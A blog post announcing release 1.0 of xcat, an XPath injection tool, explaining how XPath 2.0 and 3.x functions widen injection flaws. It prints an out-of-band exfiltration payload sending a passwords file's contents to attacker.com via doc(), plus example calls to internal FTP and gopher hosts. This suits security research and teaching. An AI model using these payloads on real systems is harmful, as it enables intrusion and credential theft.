XCat 1.0 released or: XPath injection issues are severely underrated

I’ve just released xcat 1.0 and it’s demonstration application after like 5 years of on-off development. Feels good!

The genesis of xcat was when my boss, Sid, walked up to me out of the blue and asked if I wanted to go on an all expenses paid trip to Amsterdam. Who the hell wouldn’t say yes to that proposition? “Great! you’ve got a month to write a research paper on XPath injection flaws and we will present it at Blackhat Europe”. Wait… slow down! What’s XPath?!

As it turns out XPath is what you get when you combine the unholy trinity of XML, design-by-committee and large quantities of drugs. But before I get into that here’s a short demo of me listing directories, reading arbitrary files and dumping environment variables through a simple innocuous XPath injection flaw, using xcat:

I recommend reading a little bit about what XPath is and a little bit about blind injection vulnerabilities. I wrote an introduction here or there is the venerable OWASP page on the topic.

XPath 1.0

So, back to large quantities of drugs. The year was 1999. Intel had just released the 800 MHZ Pentium III, Internet Explorer 5.0 was the hot new browser and XML was all the rage.

All was not well in the land of XML though: parsing, filtering and generally using it was a huge pain. So some clever people invented a nice, clean and concise syntax for querying it documents without any hassle:


Cool! This seems a lot simpler and more flexible than whatever manual parsing/iteration you’d come up with in $FAVORITE_LANGUAGE. And this was XPath, the people rejoiced and the world was good.

Until 2010.

XPath 2.0

It was decided in 2010 that XPath 1.0 was too simple. What it clearly, clearly lacked was a weird type system (it’s both strongly and weakly typed), a greatly expanded type heirachy (seriously go look at that), isinstance checks, casting and a much larger function library.

Now don’t get me wrong: some of these are good changes. But what snuck into this version is the fairly innocuous doc function. Seems simple - you can reference external XML files in your query (almost like a join) and I’m sure there are use cases for this.

This function jumped right out at me when I was struggling through the very, very dense XPath specification, wondering if I should just buy my own bloody holiday to Amsterdam. What does doc('https://attacker.com/xxe.xml') do? Or doc('ftp://internalserver/passwords.xml')? Or, heck, even doc('gopher://server/something')?

Turns out it does what you would expect. It makes the request. So now if you find an exploitable XPath injection flaw you can make arbitrary network requests for any XML-like document you can find. If your internal services respond with HTML that parses as XML that’s great! Or how about if all your Java/.NET configuration files are in XML, storing all those juicy database passwords? That’s even better! We can now read them and download them via any XPath 2.0 injection issue.

Other than this the interesting thing is you can use this function to exfiltrate large quantities of data really quickly. The specification very nicely includes an encode-for-uri method, so we could just do:

doc(string-join('http://attacker.com/?d', encode-for-uri(doc('passwords.xml')/some-node)))

Another cool issue is external entity injection. The tl;dr is you can serve up a malicious XML file that is requested by doc() that can read arbitrary files on the filesystem!

Awesome! xcat implements these attacks by the way.

The real kicker here is:

And this was XPath 2.0. Tom got to go to Amsterdam and present at Black Hat Europe, and the world was good.

Until 2014. At which point the drugs really kicked in.

XPath 3.0/3.1

It was decided in 2014 that XPath 2.0 was too simple. What it clearly, clearly lacked was dynamic function calls, for loops, introspection, array map/filter/reduce, associative arrays, dynamic module loading, JSON parsing, inline functions, exceptions and tracebacks.

So now our lovely, simple XPath has evolved into:

for-each(normalize-unicode(upper-case(json-doc('x.json'))) => tokenize("\s+"),
         function($a) {
            let $a := $a * 10
                        function-lookup($a, 1)(array:map($a, function($b) {
                                let $c := unparsed-text-lines($b)
                                if ($c) {
                                    return xml-to-json($b)
                                } else {
                                    error('This is an error')

Yay! The future is here! Can you smell the progress?

Aside from trying to turn XPath into some JavaScript-esque abomination they also added three interesting functions:

With these we can read any arbitrary text files, and iterate through all environment variables.

Also if your internal webservice speaks JSON, well then buddy you’re in luck! A simple XPath injection flaw can let the attacker read all of those responses using the handy JSON functions introduced in 3.1.

So by utilizing the same injection flaw and the same out-of-bound attack discussed above we can exfiltrate any readable file on the filesystem, or network, quickly and cleanly.


I’m sure they are already working on XPath 4.0. I wonder if they will add access to raw network sockets, or hell, maybe DirectX support. Why not?